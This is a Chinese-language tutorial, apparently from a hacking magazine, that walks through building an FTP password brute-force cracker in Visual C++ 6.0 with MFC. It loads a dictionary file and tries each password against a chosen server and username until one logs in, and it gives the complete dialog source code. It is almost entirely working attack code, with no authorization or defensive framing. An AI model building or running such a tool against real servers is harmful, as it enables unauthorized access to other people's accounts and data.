看我用VC打造Ftp暴力破解器
hammers
《黑防》第九期刊载了无敌小龙的VB打造FTP密码暴力破解工具,他是采用抓包的方式,直接利用VB和ftp协议来做的这个破解工具,其实如果用现成的类库,效果可能会更好些,C++效率也能更高些。下面我就用VC编程的方法,实现一个Ftp暴力破解器,从技术层面上做一下探讨。
我们打造的这个破解器,主要用到了VC中的两个类,分别是CInternetSession和GetFtpConnection。CInternetSession类是用来创建一个Internet会话的,这个会话支持三个协议,Http,Ftp和Gopher,Gopher现在基本上绝迹了,我们用到的是Ftp协议会话,从CInternetSession 的成员函数GetFtpConnection中可以直接返回一个Ftp会话的指针,GetFtpConnection的成员函数包含了操作文件的所有命令,如下载、上传、打开、删除重定位文件夹等等,这些信息我们并没有用到,关于这些信息可以参照MSDN。闲话少说,我们正式开工。
打开VC 6.0,创建一个对话框工程,界面设计如图1:
图1
服务器用来填写你要破解的Ftp服务器的IP地址,用户名是Ftp用户名,检测结果用来存放检测成功的密码,导入密码按钮用来导入字典文件。
首先做做准备活动,在stdafx.h中加上#include <afxinet.h>和#include <comdef.h>来确保两个类的引用,然后在对对话框加上两个私有变量CInternetSession *SessionPtr;和CFtpConnection *ConnectFtpPtr;,三个文本控件ID依次为IDC_EDITSER, IDC_EDITUSER和IDC_EDITRES,并为它们添加变量m_EditSer,m_EditUser和m_EditRes。检测按钮和导入密码按钮的ID为IDC_BUTBEGIN和IDC_BUTINSERT,右侧CCtrllist控件的ID为IDC_LISTPASS,为其添加一个控件变量分别为m_ListPass并设置为REPORT类型,同时给进度条添加变量为m_Progress。至此,整个程序所用到的全局变量和控件就全部准备好了。
下面开始编写程序,我们做的第一件事是将密码文件导入。密码文件每一行写一个密码,与普通的字典文件相同。
图2
做好字典文件之后给导入密码按钮添加一个函数,代码如下:
void CFtpBlDlg::OnButinsert()
{
// TODO: Add your control notification handler code here
CString strPath;
CFileDialog FileOpen(TRUE);
if(FileOpen.DoModal() == IDOK)
{
FILE *fp;
char str[1024];
strPath = FileOpen.GetPathName();
fp = fopen(strPath,"r");
int i = 0;
while(!feof(fp))
{
fgets(str, 1024, fp);
m_ListPass.InsertItem(i, str);
i += 1;
}
}
}
这段代码是创建一个文件对话框,用户选择文件之后,然后按照行将密码主动性内存再添加到CListCtrl控件中。到这你就可以看到右边出现我们预先设置的密码了,如图3所示。
图3
密码导入成功后,将服务器的IP地址和用户名填上,然后点击检测按钮就可以进行破解了。检测按钮对应的函数代码为:
UpdateData(TRUE); //将界面数据更新到控件变量中
SessionPtr = new CInternetSession
(NULL, 1, PRE_CONFIG_INTERNET_ACCESS); //创建一个Internet链接
if(SessionPtr == NULL)
{
MessageBox("链接创建失败,请检查网络");
return;
}
int i = 0;
char strPsd[1024];
BOOL Success = FALSE;
m_Progress.SetRange(0, m_ListPass.GetItemCount()); //进度条
m_Progress.SetPos(0);
while(i < m_ListPass.GetItemCount()) //按照密码逐个扫描
{
m_ListPass.GetItemText(i, 0, strPsd, 1024); //依次来取密码
if(ConnectFtp(m_EditSer, m_EditUser, strPsd) == TRUE)//进行Ftp连接
{
m_EditRes = strPsd; //连接成功
Success = TRUE;
break;
}
i += 1;
m_Progress.SetPos(i);
}
if(Success == FALSE) //失败
{
m_EditRes = "没有密码";
}
UpdateData(FALSE); //更新界面显示
这段代码是整个破解的核心,基本原理是首先将界面数据用UpdateData(TRUE)全部更新到变量中,然后创建一个CInternetSession对象,接着从CListCtrl控件中依次取出密码再进行Ftp连接,如果连接成功,则表明密码正确,停止破解,如果连接不成功,则继续扫描下一个密码。
其中ConnectFtp的代码也很简单:
TRY
{
ConnectFtpPtr = SessionPtr->GetFtpConnection(strServer, strUser, strPass, usPort);
}
CATCH_ALL(e)
{
return FALSE;
}
END_CATCH_ALL
return TRUE;
进行Ftp连接时,如果用户或密码不正确,会抛出一个异常,我们并不需要对这个异常进行处理,只需要返回一个FALSE值就好了。如果读者感兴趣,可以参照MSDN中的CInternetException类的说明,如果密码正确,则返回TRUE。
至此,我们这个简单的Ftp密码暴力破解器就基本上完成了,我们来测试一下,当没有密码符合要求时,应该是图4的样子
图4
当成功时,应该如图5所示
图5
这篇文章写到这里就可以结束了,同样一个程序的实现方法很多,看你选哪一种了,第一次写文章,如有不足之处还请多多指教,论坛上等着你。
// FtpBlDlg.cpp : implementation file
//
#include "stdafx.h"
#include "FtpBl.h"
#include "FtpBlDlg.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
/
// CAboutDlg dialog used for App About
class CAboutDlg : public CDialog
{
public:
CAboutDlg();
// Dialog Data
//{{AFX_DATA(CAboutDlg)
enum { IDD = IDD_ABOUTBOX };
//}}AFX_DATA
// ClassWizard generated virtual function overrides
//{{AFX_VIRTUAL(CAboutDlg)
protected:
virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV support
//}}AFX_VIRTUAL
// Implementation
protected:
//{{AFX_MSG(CAboutDlg)
//}}AFX_MSG
DECLARE_MESSAGE_MAP()
};
CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
//{{AFX_DATA_INIT(CAboutDlg)
//}}AFX_DATA_INIT
}
void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
//{{AFX_DATA_MAP(CAboutDlg)
//}}AFX_DATA_MAP
}
BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
//{{AFX_MSG_MAP(CAboutDlg)
// No message handlers
//}}AFX_MSG_MAP
END_MESSAGE_MAP()
/
// CFtpBlDlg dialog
CFtpBlDlg::CFtpBlDlg(CWnd* pParent /*=NULL*/)
: CDialog(CFtpBlDlg::IDD, pParent)
{
//{{AFX_DATA_INIT(CFtpBlDlg)
m_EditRes = _T("");
m_EditSer = _T("");
m_EditUser = _T("");
//}}AFX_DATA_INIT
// Note that LoadIcon does not require a subsequent DestroyIcon in Win32
m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
}
void CFtpBlDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
//{{AFX_DATA_MAP(CFtpBlDlg)
DDX_Control(pDX, IDC_PROGRESS1, m_Progress);
DDX_Control(pDX, IDC_LISTPASS, m_ListPass);
DDX_Text(pDX, IDC_EDITRES, m_EditRes);
DDX_Text(pDX, IDC_EDITSER, m_EditSer);
DDX_Text(pDX, IDC_EDITUSER, m_EditUser);
//}}AFX_DATA_MAP
}
BEGIN_MESSAGE_MAP(CFtpBlDlg, CDialog)
//{{AFX_MSG_MAP(CFtpBlDlg)
ON_WM_SYSCOMMAND()
ON_WM_PAINT()
ON_WM_QUERYDRAGICON()
ON_BN_CLICKED(IDC_BUTINSERT, OnButinsert)
ON_BN_CLICKED(IDC_BUTBEGIN, OnButbegin)
//}}AFX_MSG_MAP
END_MESSAGE_MAP()
/
// CFtpBlDlg message handlers
BOOL CFtpBlDlg::OnInitDialog()
{
CDialog::OnInitDialog();
// Add "About..." menu item to system menu.
// IDM_ABOUTBOX must be in the system command range.
ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
ASSERT(IDM_ABOUTBOX < 0xF000);
CMenu* pSysMenu = GetSystemMenu(FALSE);
if (pSysMenu != NULL)
{
CString strAboutMenu;
strAboutMenu.LoadString(IDS_ABOUTBOX);
if (!strAboutMenu.IsEmpty())
{
pSysMenu->AppendMenu(MF_SEPARATOR);
pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
}
}
// Set the icon for this dialog. The framework does this automatically
// when the application's main window is not a dialog
SetIcon(m_hIcon, TRUE); // Set big icon
SetIcon(m_hIcon, FALSE); // Set small icon
// TODO: Add extra initialization here
m_ListPass.InsertColumn(0, "密码", LVCFMT_CENTER, 80);
return TRUE; // return TRUE unless you set the focus to a control
}
void CFtpBlDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
if ((nID & 0xFFF0) == IDM_ABOUTBOX)
{
CAboutDlg dlgAbout;
dlgAbout.DoModal();
}
else
{
CDialog::OnSysCommand(nID, lParam);
}
}
// If you add a minimize button to your dialog, you will need the code below
// to draw the icon. For MFC applications using the document/view model,
// this is automatically done for you by the framework.
void CFtpBlDlg::OnPaint()
{
if (IsIconic())
{
CPaintDC dc(this); // device context for painting
SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), 0);
// Center icon in client rectangle
int cxIcon = GetSystemMetrics(SM_CXICON);
int cyIcon = GetSystemMetrics(SM_CYICON);
CRect rect;
GetClientRect(&rect);
int x = (rect.Width() - cxIcon + 1) / 2;
int y = (rect.Height() - cyIcon + 1) / 2;
// Draw the icon
dc.DrawIcon(x, y, m_hIcon);
}
else
{
CDialog::OnPaint();
}
}
// The system calls this to obtain the cursor to display while the user drags
// the minimized window.
HCURSOR CFtpBlDlg::OnQueryDragIcon()
{
return (HCURSOR) m_hIcon;
}
void CFtpBlDlg::OnButinsert()
{
// TODO: Add your control notification handler code here
CString strPath;
CFileDialog FileOpen(TRUE);
if(FileOpen.DoModal() == IDOK)
{
FILE *fp;
char str[1024];
strPath = FileOpen.GetPathName();
fp = fopen(strPath,"r");
int i = 0;
m_ListPass.DeleteAllItems();
while(!feof(fp))
{
fgets(str, 1024, fp);
m_ListPass.InsertItem(i, str);
i += 1;
}
}
}
void CFtpBlDlg::GetPram()
{
}
void CFtpBlDlg::OnButbegin()
{
// TODO: Add your control notification handler code here
UpdateData(TRUE);
SessionPtr = new CInternetSession
(NULL, 1, PRE_CONFIG_INTERNET_ACCESS); //创建一个Internet链接
if(SessionPtr == NULL)
{
MessageBox("链接创建失败,请检查网络");
return;
}
int i = 0;
char strPsd[1024];
BOOL Success = FALSE;
m_Progress.SetRange(0, m_ListPass.GetItemCount());
m_Progress.SetPos(0);
while(i < m_ListPass.GetItemCount())
{
m_ListPass.GetItemText(i, 0, strPsd, 1024);
if(ConnectFtp(m_EditSer, m_EditUser, strPsd) == TRUE)
{
m_EditRes = strPsd;
Success = TRUE;
break;
}
i += 1;
m_Progress.SetPos(i);
}
if(Success == FALSE)
{
m_EditRes = "没有密码";
}
UpdateData(FALSE);
}
BOOL CFtpBlDlg::ConnectFtp(CString strServer, CString strUser /* = "" */, CString strPass /* = "" */, unsigned short usPort /* = 21 */)
{
TRY
{
ConnectFtpPtr = SessionPtr->GetFtpConnection(strServer, strUser, strPass, usPort);
}
CATCH_ALL(e)
{
return FALSE;
}
END_CATCH_ALL
return TRUE;
}